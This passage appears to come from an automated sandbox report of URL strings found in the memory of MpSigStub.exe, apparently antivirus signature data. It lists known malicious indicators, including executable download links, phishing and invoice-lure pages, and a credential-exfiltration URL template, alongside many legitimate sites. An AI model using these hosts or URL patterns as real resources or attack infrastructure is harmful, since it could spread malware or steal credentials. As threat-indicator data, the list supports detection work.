Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/614.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/cnzz.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/jf.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://wef.grassrooters.org/index.php?xhimdbkblrjlcia
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://winmediapackage.com/rd/out.php
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000026.00000003.18331438770.00000138BD6F2000.00000004.00000001.sdmp	String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://wojass.unitedcrew.netd
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://wp.fanchen.cc/paid-invoice/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://wsus.chrobinson.com/scriptstothelocalcomputer
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://wvpt.net/invoice-receipt/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://www-search.net/?
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000026.00000003.18417485708.00000138BD45E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000026.00000003.18417485708.00000138BD45E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.31334.info/1stupload.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.37db.cn/images/dis.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.58hex.com/databack.php
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.adserver.com
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.alexa.com
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.alibaba.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.amazon.com
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.apple.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.beidou123.cn/count.asp
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/search/search.php
